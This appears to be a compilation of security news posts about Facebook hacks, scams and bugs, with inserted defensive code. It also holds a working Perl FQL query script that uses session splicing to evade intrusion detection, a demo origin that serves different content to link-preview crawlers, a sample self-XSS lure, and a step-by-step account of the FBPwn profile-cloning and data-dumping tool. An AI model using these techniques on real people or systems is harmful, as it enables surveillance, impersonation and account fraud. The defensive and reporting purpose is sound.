Hacking Any Facebook Accounts using REST API

Stephen Sclafani, a security researcher, has discovered a critical security vulnerability in the social networking giant Facebook that allowed him to hack into any Facebook account.

Stephen needed only your user ID: with it he could get into your account and read private messages, view email addresses, create or delete notes, and on top of that update your status, upload photos and tag your friends, all on your behalf.

"A misconfigured endpoint allowed legacy REST API calls to be made on behalf of any Facebook user using only their user ID," Stephen explained on his blog.

The Facebook REST API is the predecessor of Facebook's current Graph API. Using it, he was able to craft a request to the server that updated the victim's status on their behalf.


Stephen found this bug on April 23 and reported it to Facebook. After being notified, Facebook permanently fixed the bug on April 30. Facebook awarded him a $20,000 bounty for finding and reporting it.

Android malware iBanking helps attackers to hack Facebook account

An attacker can't hack into a Facebook account that has two-step authentication enabled, even if he knows the username and password. But if you think two-step authentication is enough to keep your Facebook account safe from hackers, think again!

Cyber criminals have started to use Android Banking Trojan "iBanking" to bypass Facebook's two-factor verification.

iBanking is a malicious Android application capable of intercepting SMS messages, forwarding incoming voice calls to any number and recording the victim's voice using the microphone.

Recently, RSA noted the release of the source code for the iBanking trojan. This source code leak helped other cyber criminals customize the trojan according to their needs.

ESET reports that a customized iBanking malware targeting Facebook users is being delivered via a new variant of the PC banking trojan Qadars.

When a system is infected with the Qadars trojan, it shows a message when the user logs into Facebook saying "Facebook introduces new extra safety protection system" and instructs them to install an Android app. This app helps the cybercriminals intercept SMS messages so that they can bypass Facebook's two-factor verification.

"The way iBanking is installed on the user’s mobile is quite common, but it is the first time we have seen such a mobile application targeting Facebook users for account fraud." Researchers said.

Facebook Hack: vulnerability allows attacker to launch DOS attack against any user


Chris C. Russo, a security expert, has discovered a critical vulnerability in the Facebook Chat module that allows an attacker to launch a Denial of Service (DoS) attack against any Facebook user.

He discovered the flaw in 'www.facebook.com/ajax/mercury/send_messages.php', specifically in the parameter 'message_batch[0][body]', which has no limit on the number of characters that can be sent.

So it is possible for an attacker to send a message long enough to cause a DoS condition on the remote user's client. Since Facebook allows messages to be sent to almost every user, the attack can be launched against any user.

The researcher tested the flaw with three different test users. One of the users, who used a tablet, said the tablet restarted and he was no longer able to open the Facebook app, since the chat log remained there and made the app crash again.

"In order to prevent this, the length of that parameter should be analyzed *before* sending the information to the addressee user by the asynchronous connection," the researcher said.

"Personally I believe that there must be something wrong with XSRF tokens as well, because it would allow me to send several packets using the same token that I initially extracted; however, I couldn't [verify] this information due to the ban prevention mechanism."

The researcher had notified Facebook six weeks earlier, but the Facebook team replied that there was no flaw, so he published the details on seclists.

In the past, he discovered a security flaw in MSN Messenger that allowed a hacker to cause a denial of service by sending a huge number of large packets.
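Both bugs above come down to checks the server must make before acting: the legacy REST API endpoint acted on a caller-supplied user ID instead of the authenticated session, and the chat endpoint relayed message_batch[0][body] without bounding its length. The following added Python example (not Facebook's code; the limits, session tokens and user IDs are constructed) shows the weak pattern beside the hardened form for each:

```python
"""Constructed server-side checks: the acting identity comes from the session,
and message bodies are bounded before anything is dispatched."""

# Constructed fixtures; Facebook's real limits and session format are not on the page.
MAX_BODY_CHARS = 20_000   # hypothetical per-message cap
MAX_BATCH_SIZE = 20       # hypothetical cap on messages per batch
SESSIONS = {"tok-alice": 1001, "tok-mallory": 1002}  # session token -> user ID


class Rejected(Exception):
    """Raised by a handler to refuse a request with an HTTP-style status."""
    def __init__(self, status, reason):
        super().__init__(reason)
        self.status = status
        self.reason = reason


def acting_user(headers):
    """Resolve the acting user from the session cookie, never from a request field."""
    cookie = headers.get("Cookie", "")
    token = cookie[len("session="):] if cookie.startswith("session=") else ""
    uid = SESSIONS.get(token)
    if uid is None:
        raise Rejected(401, "no valid session")
    return uid


def legacy_status_update(params):
    """The weak pattern behind the REST API bug: the endpoint believes the
    caller-supplied uid and acts as that user, with no session involved."""
    return {"acted_as": int(params["uid"]), "status": params["status"]}


def status_update(headers, params):
    """Hardened form: identity comes from the session; a uid parameter, if
    present, must match it."""
    uid = acting_user(headers)
    if "uid" in params and int(params["uid"]) != uid:
        raise Rejected(403, "uid does not match the authenticated session")
    return {"acted_as": uid, "status": params["status"]}


def send_messages(headers, params):
    """Hardened chat send: every body is length-checked before dispatch, so an
    unbounded message_batch[N][body] is never relayed to the recipient's client."""
    uid = acting_user(headers)
    bodies = []
    for i in range(MAX_BATCH_SIZE + 1):
        key = f"message_batch[{i}][body]"
        if key not in params:
            break
        if i == MAX_BATCH_SIZE:
            raise Rejected(413, "too many messages in batch")
        body = params[key]
        if len(body) > MAX_BODY_CHARS:
            raise Rejected(413, f"message {i} exceeds {MAX_BODY_CHARS} characters")
        bodies.append(body)
    if not bodies:
        raise Rejected(400, "empty batch")
    return {"sender": uid, "bodies": bodies}


def try_call(handler, *args):
    """Run a handler and return (status, payload) as a tiny HTTP front end would."""
    try:
        return 200, handler(*args)
    except Rejected as err:
        return err.status, {"error": err.reason}


if __name__ == "__main__":
    mallory = {"Cookie": "session=tok-mallory"}
    # Legacy endpoint: Mallory names Alice's uid and the post is attributed to Alice.
    print(try_call(legacy_status_update, {"uid": "1001", "status": "pwned"}))
    # Hardened endpoint: the same request is refused.
    print(try_call(status_update, mallory, {"uid": "1001", "status": "pwned"}))
    # An oversized chat message is rejected before it reaches anyone's client.
    print(try_call(send_messages, mallory, {"message_batch[0][body]": "A" * 30_000}))
```

The point of `send_messages` is where the check sits: the length is enforced in the handler that accepts the request, not in the client that later renders it, which is exactly the placement the researcher's quote asks for.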

Ethical Hacker "Glenn Mangham" admits Facebook Hacking



Software development student Glenn Mangham, from York, admitted hacking into Facebook between April and May of this year, but argued that he only wanted to show Facebook how to improve its security, as he had done for Yahoo (Mangham had previously been rewarded by Yahoo for finding vulnerabilities in its systems).
Facebook discovered evidence that pointed back to Mangham and he was arrested by the Metropolitan Police Central e-Crime Unit (PCeU) in June.

He hacked into Facebook systems and downloaded “highly sensitive intellectual property”, said prosecutor Sandip Patel.

Mangham's defence argued that he was an "ethical hacker": he was attempting to discover the vulnerabilities so that Facebook could fix them.

"That was his plan here but the activity was found by accident," said barrister Tom Ventham.

Facebook said its users’ personal data was not compromised in the security breach. Mangham will be sentenced on 17 February 2012.

Anonymous says Facebook Fawkes Virus Attack initiated already

Anonymous hackers say they have already infected Facebook with the Fawkes Virus. They released a video on YouTube. According to the video, the beta testing of this worm is complete.

They claim they have already released the worm on Facebook and plan to release it on other social networks.

Some Anonymous hackers say the Fawkes Virus is a fake operation, and others claim the attack actually failed.

"The Fifth of November was not "a fail" as many people called it, but [only] the start of the attack. The Fifth of November is only the beginning," Anonymous said in the YouTube video.

The full transcript of the video:
Greetings, Citizens of the world.
We are Anonymous.

When corruption and lies are attached with the system and function as one evil form of power, even the machines will side with The people. We are moving towards the new system of political and social functioning and governance in this world. We are moving very rapidly towards achieving that goal. We the people from all over the world are collaborating with each other through the Internet.

We are watching you all and your machines are working for us. The Fawkes Virus is here. Its beta testing has completed and it is now a fully armed and operational piece of weaponry. It has already been released on Facebook and will be released on other social networking sites very soon. The Fifth of November was not "a fail" as many people called it, but [only] the start of the attack. The Fifth of November is only the beginning.

You cannot run from us. We have your personal data. We have your psychological profiles. Corrupters will be exploited. The innocent will be deleted. The world will be reclaimed.

The corrupt fear us, the honest support us, the heroic fight with us.

Project Mayhem 2012, engaged.

We are Anonymous.
We are Legion.
We do not forgive.
We do not forget.
Expect us.

On Nov 11th, Anonymous hackers claimed they were going to unleash the Fawkes virus. On Nov 12th, BitDefender Safego detected a virus that functions approximately like the worm mentioned by Anonymous.

Recently, Facebook was flooded with porn images; some security experts said it might be an Anonymous attack, but Facebook reported that it was a "Self-XSS" social engineering attack.

Indian Accounts were not affected by Spam Attack says Facebook


Across the world, many Facebook users were affected by the Facebook spam attack that distributed porn images. But Facebook has denied that the spam attack affected India.

Facebook has 25 million users in India. 2 lakh people in Bangalore reported being affected by this attack. However, BA Mahesh, who heads the cyber cell of the Bangalore police, says no formal complaints have been received.

"This is not true. Users' photos are not being transferred to an unwanted site and no accounts have been compromised. Protecting the people who use Facebook from spam and malicious content is a top priority for us. We are always working to improve our systems to isolate and remove material that violates our terms, and take action on those who are responsible for these types of content," a Facebook executive said.

BreakTheSecurity says: don't fall for the social engineering attack. If anyone asks you to paste unknown code into your browser, don't do it. Learn more about the Self-XSS attack and how to prevent it.


Facebook blames Browser Vulnerability for the pornographic spam Attack


Yesterday, pornographic spam hit Facebook: explicit and violent images were posted on many users' walls without their knowledge.


Facebook has acknowledged the spam attack. According to its statement, the attackers exploited a browser vulnerability that allows "Self-XSS".

Self-XSS (self cross-site scripting): an attacker gets you to execute malicious JavaScript code in your own browser, which gives it access to whatever website you are visiting (not only Facebook).

Most of the time, the spam message asks you to copy some JavaScript and enter it into the browser's URL box in order to get something (e.g. a gift card or a "Facebook stalker" viewer). Doing so executes the malicious code, which results in account hijacking or the spam message spreading further.

It is unclear which browser is vulnerable. Hopefully they will fix it soon.

If you would like to know more about the Self-XSS attack, please check here:
Self-XSS, one of the social engineering attacks.
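The self-XSS lure described above (and in the earlier spam-attack item) is a social engineering message, so a defender's detection runs over message text rather than over code. Below is an added Python example, not Facebook's or BreakTheSecurity's code, that flags a message when it contains a script-scheme URI, or when an instruction to paste something into the browser is paired with a bait offer. The sample posts are constructed, not real captured spam.

```python
import re

# Constructed sample wall posts and chat messages (not real captured spam).
SAMPLES = [
    "FREE $100 gift card!! paste this in your address bar: javascript:eval(atob('...'))",
    "See who is stalking your profile! Copy the code below into your browser URL box and press enter",
    "Happy birthday Sam, see you at the party on Saturday",
    "Check out this article on the new privacy settings: https://example.com/privacy-guide",
    "data:text/html;base64,PHNjcmlwdD4= open this in the url bar to unlock the video",
]

# A javascript: or data: URI has no business in a wall post; on its own it is enough to flag.
JS_URI = re.compile(r"\b(javascript|data)\s*:", re.IGNORECASE)
# "paste/copy/enter/type ... address bar/URL box/browser/console" is the self-XSS instruction.
PASTE_INSTRUCTION = re.compile(
    r"\b(paste|copy|enter|type)\b.{0,60}\b(address bar|url (box|bar)|browser|console)",
    re.IGNORECASE | re.DOTALL,
)
# The bait that the page describes: gift cards, "who viewed your profile", free stuff.
BAIT = re.compile(r"\b(gift card|stalk\w*|who viewed|free\b|unlock)", re.IGNORECASE)


def signals(text):
    """Return the list of signals present in a message, in a fixed order."""
    found = []
    if JS_URI.search(text):
        found.append("script-scheme URI")
    if PASTE_INSTRUCTION.search(text):
        found.append("paste-into-browser instruction")
    if BAIT.search(text):
        found.append("bait offer")
    return found


def classify(text):
    """Flag on a script URI alone, or on a paste instruction combined with bait;
    a paste instruction by itself (e.g. support text) is not enough."""
    found = signals(text)
    flagged = "script-scheme URI" in found or (
        "paste-into-browser instruction" in found and "bait offer" in found
    )
    return flagged, found


def scan(messages):
    """Indices of the messages that should be held for review."""
    return [i for i, text in enumerate(messages) if classify(text)[0]]


if __name__ == "__main__":
    for i, text in enumerate(SAMPLES):
        flagged, found = classify(text)
        print(f"[{'FLAG' if flagged else ' ok '}] #{i}: {found}")
```

Requiring two independent signals for the instruction-based rule keeps false positives down on legitimate help text ("type the address into your browser"), while a script-scheme URI is flagged unconditionally because a normal user never needs to share one.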


Anonymous unleashed "Fawkes Virus" worm on Facebook

The hacktivist group Anonymous has unleashed the "Fawkes Virus" worm on Facebook's servers. The operation is named "Fawkes Virus". They announced the operation via a video on YouTube.

According to the video, the Fawkes Virus is a sophisticated worm, and a hacked account could open users up to attacks on their hard drives and loss of control over their entire systems. Although it seems firmly rooted in Facebook, the video said that it could be applied to any social network and added, "We did not expect the intensity in which it would spread."

More announcements about the operation:

Anonymous would like to welcome you to the Fawkes virus which was fully written by Anonymous programmers.


We did not expect the intensity in which it would spread.


After the worm is under control, Anonymous will use this to its advantage against corruption and as an alternative attack against its opponents.

"I'm a legitimate member of Anonymous. The virus was intended to target FB's servers, and not user accounts; I was simply offering the facts, as opposed to lying. If you spent a bit of time researching how FB handles your data and how it disables thousands of accounts for no reason, [you would see that] FB refuses to take down images of graphic violence, sexual exploitation and animal cruelty off Facebook due to a loophole. If you still don't understand why we target FB then you clearly don't understand Anonymous." AnonSecurity157 commented on YouTube below the video.




"If it's not a hoax, it appears to have the characteristics of 2008's Koobface, but unlike its predecessor it should also receive commands from a remote attacker and simulate "basic actions on Facebook accounts, such as sending a friend request or a message". The worm could be carried onto other accounts with little or no interaction, as it allegedly bypasses your application security and automatically sends infected links to the unsuspecting contacts in the list of friends," the Malware City report says.

"According to the video, the worm is sophisticated and a hacked account could open users up to hacks on their hard drives and loss of control over their entire systems. Although it seems firmly rooted in Facebook, the video said that it could be applied to any social network," The Inquirer's report says.

Facebook, Google+ vulnerable to content restriction bypass


Facebook is currently vulnerable to a bypass of the content restrictions on links and posts put on a user's public wall. Facebook was notified of these vulnerabilities on July 31st, 2011. To date (October 4, 2011) Facebook has yet to do anything about it, so BlackhatAcademy decided to release the details publicly.

FQL
Simply requiring an API key for privileged queries does not stop people from arbitrarily obtaining one. Facebook was even so kind as to give a reference of tables and columns in the documentation for FQL. To access Facebook's FQL API, it takes only a well-formed HTTP request with an embedded API key to return a valid XML object. FQL does not allow the use of JOINs; however, that is not needed, as everything is thoroughly documented. Attackers can misuse this during the creation of a malicious Facebook application or directly on the FQL development API page for information gathering. The implementation below uses LibWhisker2 for IDS evasion via session splicing.


#!/usr/bin/perl
use strict;
use warnings;
use XML::Simple;
use LW2;
use Getopt::Std;

# The query comes from -q; a harmless default is used otherwise.
my %opts;
getopts('q:', \%opts);
my $query = defined $opts{q} ? $opts{q} : "SELECT pic_big FROM user WHERE uid=6666666";

my $ref = fqlQuery($query);
die "No response from the FQL endpoint.\n" unless defined $ref;

# Walk the parsed XML (up to three levels deep) and print it as an indented tree.
foreach my $parent (sort keys %{$ref}) {
    if (ref $ref->{$parent} eq 'HASH') {
        print "$parent: \n";
        foreach my $key (sort keys %{$ref->{$parent}}) {
            if (ref $ref->{$parent}->{$key} eq 'HASH') {
                print "\t$key : \n";
                foreach my $mojo (sort keys %{$ref->{$parent}->{$key}}) {
                    print "\t\t$mojo : " . $ref->{$parent}->{$key}->{$mojo} . "\n";
                }
            } else {
                print "\t$key : " . $ref->{$parent}->{$key} . "\n";
            }
        }
    } else {
        print "$parent : " . $ref->{$parent} . "\n";
    }
}

# URL-encode the spaces in the query, fetch the result and parse the XML reply.
sub fqlQuery {
    my $q = shift;
    $q =~ s/ /%20/g;
    my $link = "http://api.facebook.com/method/fql.query?query=$q";
    my $text = download($link, "api.facebook.com");
    return undef unless defined $text;
    return XMLin($text);
}

# Fetch $uri from $host with LibWhisker2, retrying up to $try times.
# encode_anti_ids mode 9 is LibWhisker's session-splicing evasion mode.
sub download {
    my ($uri, $host, $try) = @_;
    $try = 5 unless defined $try;
    my (%request, %response);
    LW2::http_init_request(\%request);
    $request{'whisker'}->{'method'}          = "GET";
    $request{'whisker'}->{'host'}            = $host;
    $request{'whisker'}->{'uri'}             = $uri;
    $request{'whisker'}->{'encode_anti_ids'} = 9;
    $request{'whisker'}->{'user-agent'}      = "";
    LW2::http_fixup_request(\%request);
    if (LW2::http_do_request(\%request, \%response)) {
        # A non-zero return means the request failed; retry while attempts remain.
        if ($try > 1) {
            print "Failed to fetch $uri (attempts left: " . ($try - 1) . "). Retrying...\n";
            return download($uri, $host, $try - 1);
        }
        print "Failed to fetch $uri.\n";
        return undef;
    }
    return $response{'whisker'}->{'data'};
}

Content Forgery
While most major sites that allow link submission are vulnerable to this method, sites including Websense, Google+ and Facebook make the requests easily identifiable. These sites send an initial request to the link in order to store a mirror thumbnail of the image, or a snapshot of the website being linked to. In doing so, many use a custom user agent, or have IP addresses that resolve to a consistent domain name. Facebook's IP addresses resolve to tfbnw.net, and it also sets a custom user agent of "facebookexternalhit". Google+ (also notified Jul. 31st, and equally guilty of "reasonable care") follows suit and uses "Feedfetcher-Google" as its user agent. Knowing this, we can easily filter out requests coming from these websites and offer up a legitimate image to be displayed on their site, while redirecting or displaying a completely different page to anyone who follows the link.

Facebook's recent partnership with Websense is laughable, because Websense's "ACE" security scanner is just as easily identified, by using gethostbyaddr to resolve the IP back to websense.com. Utilizing this technique would allow an overwhelming number of malware sites to remain undetected by their automatic site analysis.

Other sites like digg.com either spoof a user agent to look like normal traffic, or forward the client's user agent, which makes it more difficult to catch every one of their requests. Fortunately, digg.com only requests the link once, prior to submitting the link to the world. This allows attackers to serve up a legitimate image until that initial request clears their server, and then replace it with a less than honest file. We have affectionately named this vulnerability class Cross-Site Content Forgery.

For more info follow this link:
http://www.blackhatacademy.org/security101/index.php?title=Facebook
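As an added defender-side example (not BlackhatAcademy's code, and not how Facebook's or Google's fetchers actually work), here is how a link-preview service could catch both variants described above: an origin that serves different content depending on whether the requester looks like the platform's crawler, and an origin that swaps the content after the single pre-submission fetch. The "facebookexternalhit" user agent and the tfbnw.net reverse-DNS suffix are from the page; the origins, IP addresses and the reverse-DNS table are constructed stand-ins for real servers and gethostbyaddr lookups. The mitigation is to fetch once as the identifiable crawler, once as a generic client from an unattributable address, compare fingerprints, and re-verify at click time against the fingerprint recorded at submission.

```python
import hashlib

# Constructed reverse-DNS table standing in for gethostbyaddr() lookups.
RDNS = {
    "203.0.113.10": "crawler-1.tfbnw.net",         # looks like the platform's own fetcher
    "198.51.100.7": "residential.isp.example",     # looks like an ordinary user
}

# (user agent, client address) for the two fetches the checker performs.
CRAWLER = ("facebookexternalhit/1.1", "203.0.113.10")
PROBE = ("Mozilla/5.0 (Windows NT 6.1) Gecko Firefox", "198.51.100.7")

BENIGN = b"\x89PNG benign-image-bytes"


def honest_origin(ua, client_ip):
    """Constructed origin that serves the same file to everyone."""
    return BENIGN


def cloaking_origin(ua, client_ip):
    """Constructed origin using the technique the page describes: recognise the
    preview crawler by user agent or reverse DNS and hand it a harmless image,
    while everyone else gets a different page."""
    host = RDNS.get(client_ip, "")
    if "facebookexternalhit" in ua or host.endswith(".tfbnw.net"):
        return BENIGN
    return b"<html><script>/* not the image the reviewer saw */</script></html>"


class SwapAfterFirstOrigin:
    """Constructed origin for the single-fetch case (the digg.com scenario): the
    first request gets the benign file, every later request gets a swapped one."""
    def __init__(self):
        self.requests = 0

    def __call__(self, ua, client_ip):
        self.requests += 1
        return BENIGN if self.requests == 1 else b"<html>swapped after approval</html>"


def fingerprint(body):
    """Stable fingerprint of a response body."""
    return hashlib.sha256(body).hexdigest()


def check_for_cloaking(fetch, crawler=CRAWLER, probe=PROBE):
    """Fetch as the identifiable crawler and again as a generic browser from an
    address that does not resolve to the platform. A mismatch means the
    submitter is serving the reviewer something different from what users get."""
    seen_by_crawler = fingerprint(fetch(*crawler))
    seen_by_user = fingerprint(fetch(*probe))
    return {
        "cloaked": seen_by_crawler != seen_by_user,
        "crawler_fingerprint": seen_by_crawler,
        "user_fingerprint": seen_by_user,
    }


def verify_at_click(stored_fingerprint, fetch):
    """Re-fetch as a generic client when a user actually follows the link and
    compare with the fingerprint recorded at submission; a change means the
    content was swapped after the one-time review."""
    return fingerprint(fetch(*PROBE)) == stored_fingerprint


if __name__ == "__main__":
    print("honest origin  :", check_for_cloaking(honest_origin)["cloaked"])
    print("cloaking origin:", check_for_cloaking(cloaking_origin)["cloaked"])
    swapper = SwapAfterFirstOrigin()
    recorded = fingerprint(swapper(*CRAWLER))        # what the reviewer saw once
    print("swap detected at click:", not verify_at_click(recorded, swapper))
```

The two checks are complementary: the double fetch defeats user-agent and reverse-DNS cloaking only if the probe really is unattributable (a generic user agent from an address outside the platform's ranges), and the click-time re-verification is what catches a swap made after a fetcher that only ever looks once has moved on.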

Thailand Prime Minister Twitter, Facebook accounts Hacked

Prime Minister Yingluck Shinawatra's personal Twitter account was hacked yesterday in what officials said was possibly part of a conspiracy to embarrass the government.

The false tweets accused her of cronyism and various failures. The final post read: "If she can't even protect her own Twitter account, how can she protect the country?"

Authorities vowed to prosecute the guilty parties. Information and Communication Technology Minister Anudith Nakornthap said an investigation found the hacker used a prepaid phone card and an iPhone to access the accounts. He denied a report that an arrest was imminent, but said details from the investigation would be announced today.

Ms. Yingluck won a clear victory in July, but is accused by her critics of being a puppet of her brother, former Premier Thaksin Shinawatra, who was thrown out of office in a 2006 military coup.

GOOGLE | YOUTUBE | MYSPACE | FACEBOOK | GMAIL | BING | MICROSOFT Hacked


Can't believe this: a hacker called dr@g has hacked the Guadeloupe (.gp) domains of Google, Microsoft, Motorola, Orange, Facebook, YouTube, Myspace, Live, Hotmail, Bing, Visa, Opera, Gmail, Joomla, Ubuntu, Internet and Bank of America and defaced them. The hacker is in the team called Moroccan Security Cr3w.
It looks like DNS hijacking (but this is not confirmed).

Hacked Site List:
http://www.google.gp/
http://www.google.com.gp/
http://www.google.net.gp/
http://microsoft.gp/
http://internet.gp/
http://motorola.gp/
http://orange.gp/
http://www.oracle.gp/
http://opera.gp/
http://ubuntu.gp/
http://yahoo.gp/
http://www.facebook.gp/
http://www.youtube.gp/
http://www.bing.gp/
http://www.joomla.gp/
http://www.myspace.gp/
http://www.ciscosystems.gp/
http://www.googleplus.gp/
http://www.gmail.gp/
http://live.gp/
http://bankamerica.gp/

Mirror:

http://www.zone-h.com/mirror/id/14877986
http://www.zone-h.com/mirror/id/14877923
http://www.zone-h.com/mirror/id/14877133
http://www.zone-h.com/mirror/id/14877973
http://www.zone-h.com/mirror/id/14877865
http://www.zone-h.com/mirror/id/14877897
http://www.zone-h.com/mirror/id/14877917
http://www.zone-h.com/mirror/id/14877916
http://www.zone-h.com/mirror/id/14877915
http://www.zone-h.com/mirror/id/14877912
http://www.zone-h.com/mirror/id/14877082
http://www.zone-h.com/mirror/id/14877090
http://www.zone-h.com/mirror/id/14877091
http://www.zone-h.com/mirror/id/14877094
http://www.zone-h.com/mirror/id/14877096
http://www.zone-h.com/mirror/id/14877119
http://www.zone-h.com/mirror/id/14877171
http://www.zone-h.com/mirror/id/14877235
http://www.zone-h.com/mirror/id/14877294
http://www.zone-h.com/mirror/id/14877820
http://www.zone-h.com/mirror/id/14877983
http://www.zone-h.com/mirror/id/14877864



FBPwn ~ A cross-platform Java based Facebook profile dumper



Friends, if you get an invitation from a stranger on Facebook, don't accept it. Even if you know the person, please verify whether the profile is real or not. A new hacking tool is available that will send a friend request to you. If you accept, it can steal all your info, photos and friend list. Think twice before accepting an invitation.

FBPwn is a cross-platform Java-based Facebook profile dumper. It sends friend requests to a list of Facebook profiles and polls for the acceptance notification. Once the victim accepts the invitation, it dumps all their information, photos and friend list to a local folder.

Usage

A typical scenario is to gather the information from a user profile. The plugins are just a series of normal operations on FB, automated to increase the chance of getting the info.

Typically, you first create a new blank account for the purpose of the test. Then the friending plugin runs first, adding all the friends of the victim (to have some common friends). Then the cloning plugin asks you to choose one of the victim's friends. The cloning plugin clones only the display picture and the display name of the chosen friend and sets them on the authenticated account. Afterwards, a friend request is sent to the victim's account. The dumper polls, waiting for the friend request to be accepted. As soon as the victim accepts, the dumper starts to save all accessible HTML pages (info, images, tags, etc.) for offline examination.

After a few minutes, the victim will probably unfriend the fake account once he/she figures out it's fake, but by then it is probably too late!


Modules Description:
All modules work on a selected profile URL (we'll call him bob), using a valid authenticated account (we'll call him mallory).

FBPwn modules are:

- AddVictimFriends: Request to add some or all friends of bob to increase the chance of bob accepting any future requests, after he finds that you have common friends.

- ProfileCloner: A list of all bob's friends is displayed and you choose one of them (we'll call him andy). FBPwn will change mallory's display picture and basic info to match andy's. This increases the chance that bob accepts requests from mallory, as he thinks he is accepting andy. Eventually bob will realize this is not andy's account, but it would probably be too late, as all his info is already saved for offline checking by mallory.

- CheckFriendRequest: Checks if mallory is already a friend of bob; if so, execution just ends. If not, the module tries to add bob as a friend and polls, waiting for him to accept. The module will not stop executing until the friend request is accepted.

- DumpFriends: Accessible friends of bob are saved for offline viewing. The output of the module depends on other modules; if mallory is not a friend of bob yet, the data might not be accessible and nothing will be dumped.

- DumpImages: Accessible images (tagged and albums) are saved for offline viewing. The same limitations as DumpFriends apply.

- DumpInfo: Accessible basic info is saved for offline viewing. The same limitations as DumpFriends apply.


Student hacker 'penetrated' Facebook

A student hacker successfully “penetrated” Facebook during repeated attempts to illegally access the social networking site’s programmes, a court heard.
In one of the first cases of its kind in Britain, Glenn Steven Mangham, 25, used “considerable technical expertise” to repeatedly bypass security at the world’s dominant social network, it was claimed.

The student, from York, faces five charges, including that he "made, adapted, supplied or offered to supply" a computer program to hack into a Facebook server, Westminster magistrates' court heard.

Police sources described the incidents as one of the first investigations into attempts to illegally access the site, which boasts more than 750 million members worldwide.

One Scotland Yard source told The Daily Telegraph that detectives were not aware of any hacking attempts “to this extent” on the site in Britain. It is understood Mangham does not have a Facebook profile.

Mangham was arrested by officers from the Metropolitan Police’s Central e-Crime Unit in early June on suspicion of “computer hacking offences” before being charged earlier this month.


Anonymous Aims to Destroy(Hack) the Facebook on Nov 5th-Rumours

Some rumours are spreading over the internet that Anonymous is going to kill Facebook on Nov 5th. But Anonymous has said this is false hype and that it has no such plans. Even if there are some individuals, they do not represent the whole of Anonymous.


Facebook killer video scam spreads between social networkers

A new scam titled "Facebook killer video" is spreading over Facebook.

Here you can see the screen shot of that Facebook Scam.